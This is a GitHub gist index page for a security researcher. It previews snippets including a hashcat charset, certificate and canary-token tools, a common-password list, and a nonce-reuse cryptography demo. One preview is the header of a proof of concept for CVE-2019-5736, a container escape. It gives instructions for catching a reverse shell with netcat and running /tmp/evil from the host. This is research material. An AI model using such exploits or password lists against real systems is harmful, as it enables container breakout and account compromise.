@singe
singe / sources.md
Last active September 28, 2020 10:59
Richard Serra & Carlota Fay Schoolman's "Television Delivers People" from March 1973
@singe
singe / README.md
Last active March 19, 2022 03:15
Windows Arabic Code Page (1265) for hashcat

A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.

@singe
singe / Dockerfile
Last active May 29, 2020 19:49
Simple canary token binary wrapper
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@singe
singe / create_certs.sh
Last active November 18, 2022 20:22
A simple tshark EAP certificate extractor
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / cve-2019-5736.py
Last active April 30, 2023 06:18
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / xe.sh
Created May 8, 2018 13:11
A super simple script to pull currency info from xe.com
#!/bin/sh
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
url="https://www.xe.com/currencyconverter/convert/"
amount="$1"
fromcur="$2"
tocur="$3"
if [ -z "$fromcur" ]; then # Use default currencies (-z is POSIX; == is not portable under /bin/sh)
fromcur="ZAR"
tocur="GBP"
fi
@singe
singe / allowed.txt
Last active May 28, 2019 06:07
LinkedIn Top 10k Passwords Compared to Twitter Password Blacklist
123456789:allowed
linkedin:allowed
000000:allowed
linked:allowed
1234567890:allowed
222222:allowed
555555:allowed
pakistan:allowed
chocolate:allowed
Linkedin:allowed
@singe
singe / docker-for-mac-linuxkit-build.sh
Created March 14, 2018 21:01
A simple script to rebuild the linuxkit image used in Docker for Mac.
git clone https://github.com/linuxkit/linuxkit
cd linuxkit
currdir=$(pwd)
make
export PATH=$PATH:$currdir/bin
foo=$(grep isoEfi\ $currdir/src/cmd/linuxkit/vendor/github.com/moby/tool/src/moby/output.go|cut -d\" -f2)
docker pull $foo
cd examples
linuxkit build --format iso-efi docker-for-mac.yml
mv /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso.orig
@singe
singe / request-proxy-facebook.py
Last active October 1, 2022 23:30
Simple Python requests to browser reverse proxy example.
#!/usr/bin/env python3
# A simple demo of Python requests to reverse proxy
# It's an intermediate between vanilla requests and Selenium
# It lets you interact programmatically, but still run JS in
# the browser, without Selenium overhead
#
# This is an example of automating aspects of Facebook
#
# by @singe
@singe
singe / aes-ccm-noncense.py
Created October 18, 2017 18:58
Simple demonstration of how you can recover plaintext from a stream cipher when the nonce is reused.
#!/usr/bin/env python3
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
pairwiseTransientKey = b'pairwiseTransKey'
EAPOLheader = b'Unencrypted Frame Stuff'
plaintext1 = b'Attack at dawn'
nonce1 = get_random_bytes(11)